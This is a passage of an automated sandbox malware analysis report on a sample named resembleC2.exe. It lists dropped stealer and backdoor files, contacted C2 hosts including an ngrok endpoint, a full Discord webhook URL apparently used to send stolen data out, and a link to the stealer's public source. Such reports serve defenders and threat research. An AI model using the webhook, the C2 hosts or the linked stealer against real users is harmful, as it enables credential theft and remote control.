                            resembleC2.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\MoonHub.exe100%AviraHEUR/AGEN.1307507
                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr100%AviraHEUR/AGEN.1307507
                            C:\Users\user\AppData\Local\Temp\MoonHub.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe100%Joe Sandbox ML
                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr100%Joe Sandbox ML
                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr76%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer
                            C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe34%ReversingLabsByteCode-MSIL.Backdoor.Crysan
                            C:\Users\user\AppData\Local\Temp\MoonHub.exe76%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer
                            C:\Users\user\AppData\Local\Temp\resemble.py0%ReversingLabs

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            https://drive.0b0%Avira URL Cloudsafe
                            http://pesterbdd.com/images/Pester.pngP0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            discord.com
                            		162.159.135.232
                            		truefalse
                              		high
                              ip-api.com
                              		208.95.112.1
                              		truefalse
                                		high
                                0.tcp.eu.ngrok.io
                                		18.153.198.123
                                		truefalse
                                  		unknown
                                  coprophile.bounceme.net
                                  		unknown
                                  		unknownfalse
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://discord.com/api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKwfalse
                                      		high
                                      http://ip-api.com/line/?fields=hostingfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://mail.google.com/mail/?usp=installed_webappMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.micpowershell.exe, 0000000B.00000002.2307172685.0000017A76B10000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://mail.google.com/mail/installwebapp?usp=chrome_defaultMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.microsoftpowershell.exe, 0000001C.00000002.2845407848.000001994D12F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://docs.google.com/presentation/JMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://docs.google.com/document/JMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.google.com/drive/installwebapp?usp=chrome_defaultMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://contoso.com/Licensepowershell.exe, 0000001C.00000002.2823703286.0000019944D5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://discordapp.com/api/v9/users/resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, resembleC2.exe, 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.drfalse
                                                          		high
                                                          https://www.youtube.com/:MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://discord.comMoonHub.exe, 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565AB1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://mail.google.com/mail/:MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://docs.google.com/document/installwebapp?usp=chrome_defaultMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://docs.google.com/presentation/:MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://docs.google.com/presentation/installwebapp?usp=chrome_defaultMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://docs.google.com/document/:MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://docs.google.com/spreadsheets/JMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://docs.google.com/presentation/installwebapp?usp=chr.MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://docs.google.com/spreadsheets/?usp=installed_webappMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://mail.google.com/mail/JMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://contoso.com/powershell.exe, 0000001C.00000002.2823703286.0000019944D5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.2297767430.0000017A10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2364720632.000001E15EB8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2434275066.000001E16D33D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2434275066.000001E16D473000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2568073156.000001AD9007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD818CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2568073156.000001AD901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2823703286.0000019944E92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2823703286.0000019944D5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://docs.google.com/spreadsheets/:MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://drive.google.com/?lfhs=2MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://ip-api.comMoonHub.exe, 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A435000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://oneget.orgXpowershell.exe, 00000011.00000002.2364720632.000001E15E925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD81794000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.youtube.com/s/notifications/manifest/cr_install.htmlMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name6z2guuz0ldkdgc1o.exe, 00000002.00000002.3349008957.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A3D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2278669843.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2319166030.000001E800021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2364720632.000001E15D2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019934CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.youtube.com/?feature=ytcaMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, resembleC2.exe, 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.drfalse
                                                                                                    		high
                                                                                                    https://www.youtube.com/JMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.2297767430.0000017A10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2364720632.000001E15EB8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2434275066.000001E16D33D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2434275066.000001E16D473000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2568073156.000001AD9007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD818CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2568073156.000001AD901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2823703286.0000019944E92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2823703286.0000019944D5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000011.00000002.2364720632.000001E15E925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD81794000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://discord.comMoonHub.exe, 00000005.00000002.2902392061.000001565AAE8000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A786000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://discord.com/api/v10/users/gqnbO.scr.5.drfalse
                                                                                                              		high
                                                                                                              https://drive.google.com/:MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001C.00000002.2652291240.0000019936523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2650762653.0000019934BD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000B.00000002.2278669843.0000017A00229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001C.00000002.2652291240.0000019936523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2650762653.0000019934BD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://contoso.com/Iconpowershell.exe, 0000001C.00000002.2823703286.0000019944D5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://drive.google.com/JMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 0000001C.00000002.2652291240.0000019936523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2650762653.0000019934BD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://github.com/Blank-c/Umbral-StealergqnbO.scr.5.drfalse
                                                                                                                              		high
                                                                                                                              http://pesterbdd.com/images/Pester.pngPpowershell.exe, 00000011.00000002.2364720632.000001E15EB30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://drive.0bMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://docs.google.com/presentation/installwebapp?usp=chrMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://github.com/Blank-c/Umbral-StealerhTMoonHub.exe, 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.2278669843.0000017A00229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://discord.com/api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQMoonHub.exe, 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565AB1B000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A3D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://docs.google.com/presentation/?usp=installed_webappMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://docs.google.com/presentation/installwebapp?usp=chro0bMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://aka.ms/pscore68powershell.exe, 0000000B.00000002.2278669843.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2319166030.000001E80005C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2319166030.000001E800049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2364720632.000001E15D2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019934CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://ip-api.com/json/?fields=225545PMoonHub.exe, 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://docs.google.com/document/?usp=installed_webappMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://oneget.orgpowershell.exe, 00000011.00000002.2364720632.000001E15E925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD81794000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://ip-api.com/json/?fields=225545resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.drfalse
                                                                                                                                                      		high

                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public IPs

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      208.95.112.1
                                                                                                                                                      		ip-api.comUnited States
                                                                                                                                                      		53334TUT-ASUSfalse
                                                                                                                                                      3.78.28.71
                                                                                                                                                      		unknownUnited States
                                                                                                                                                      		16509AMAZON-02USfalse
                                                                                                                                                      18.153.198.123
                                                                                                                                                      		0.tcp.eu.ngrok.ioUnited States
                                                                                                                                                      		16509AMAZON-02USfalse
                                                                                                                                                      162.159.135.232
                                                                                                                                                      		discord.comUnited States
                                                                                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                      Analysis ID:1589390
                                                                                                                                                      Start date and time:2025-01-12 07:09:12 +01:00
                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 8m 45s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                      Number of analysed new started processes analysed:35
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Sample name:resembleC2.exe
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.troj.adwa.spyw.evad.winEXE@45/27@7/4
                                                                                                                                                      EGA Information:
                                                                                                                                                      • Successful, ratio: 25%
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 69%
                                                                                                                                                      • Number of executed functions: 279
                                                                                                                                                      • Number of non-executed functions: 15
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                                      Warnings

                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 216.58.206.35, 13.107.246.45, 184.28.90.27, 52.149.20.212, 4.175.87.197
                                                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 1492 because it is empty
                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 2220 because it is empty
                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 4696 because it is empty
                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 5960 because it is empty
                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 6700 because it is empty
                                                                                                                                                      • Execution Graph export aborted for target resembleC2.exe, PID 1124 because it is empty
                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      TimeTypeDescription
                                                                                                                                                      01:10:18API Interceptor1x Sleep call for process: OpenWith.exe modified
                                                                                                                                                      01:10:23API Interceptor5x Sleep call for process: WMIC.exe modified
                                                                                                                                                      01:10:26API Interceptor56048x Sleep call for process: MoonHub.exe modified
                                                                                                                                                      01:10:26API Interceptor33x Sleep call for process: powershell.exe modified

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      208.95.112.1F0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                      fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                      4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                      aik1mr9TOq.exeGet hashmaliciousPredatorBrowse
                                                                                                                                                      • ip-api.com/json/
                                                                                                                                                      DUWPFaZd3a.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                      tb4B9ni6vl.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                      juE8dtqPkx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                      YY3k9rjxpY.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                      4LbgdNQgna.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                      toIuQILmr1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                      3.78.28.71CrSpoofer.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                        7299_output.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                          TLH3anP3lh.exeGet hashmaliciousNjratBrowse
                                                                                                                                                            r0FS3r7Ore.exeGet hashmaliciousNjratBrowse
                                                                                                                                                              lXLWfHWHMd.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                4zeGOaTirn.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                  18.153.198.123CrSpoofer.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                    YiWuyX184J.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                      TLH3anP3lh.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                        OLHskBFtS1.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                          tjK8Z8Q3JH.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                            4zeGOaTirn.exeGet hashmaliciousNjratBrowse

                                                                                                                                                                              Domains

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              discord.comdriver.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                              I334hDwRjj.exeGet hashmaliciousBlank Grabber, NjratBrowse
                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                              random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                                              • 162.159.128.233
                                                                                                                                                                              random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                                              • 162.159.136.232
                                                                                                                                                                              47SXvEQ.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                              P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                              • 162.159.128.233
                                                                                                                                                                              paint.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                              hkMUtKbCqV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                              X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                              KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                              ip-api.comF0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              aik1mr9TOq.exeGet hashmaliciousPredatorBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              DUWPFaZd3a.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              tb4B9ni6vl.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              juE8dtqPkx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              YY3k9rjxpY.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              4LbgdNQgna.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              toIuQILmr1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                              0.tcp.eu.ngrok.ioCrSpoofer.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                              • 3.78.28.71
                                                                                                                                                                              7299_output.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 3.78.28.71
                                                                                                                                                                              Opera.exeGet hashmaliciousZTratBrowse
                                                                                                                                                                              • 52.57.120.10
                                                                                                                                                                              YiWuyX184J.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                              • 3.74.27.83
                                                                                                                                                                              TLH3anP3lh.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                              • 52.57.120.10
                                                                                                                                                                              r0FS3r7Ore.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                              • 3.74.27.83
                                                                                                                                                                              OLHskBFtS1.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                              • 3.74.27.83
                                                                                                                                                                              lXLWfHWHMd.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                              • 18.192.31.30
                                                                                                                                                                              tjK8Z8Q3JH.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                              • 18.153.198.123
                                                                                                                                                                              4zeGOaTirn.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                              • 3.78.28.71

                                                                                                                                                                              ASNs

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              AMAZON-02UShttp://logiinnmaskemettaha93.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 13.248.243.5
                                                                                                                                                                              http://app-metamask.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.248.243.5
                                                                                                                                                                              http://meittaammasskei-loogge.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 18.192.130.3
                                                                                                                                                                              http://matamask-usaklog.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 13.248.243.5
                                                                                                                                                                              http://metamssk-luggiinn.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 13.248.243.5
                                                                                                                                                                              http://metamaeskloegin.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 13.248.169.48
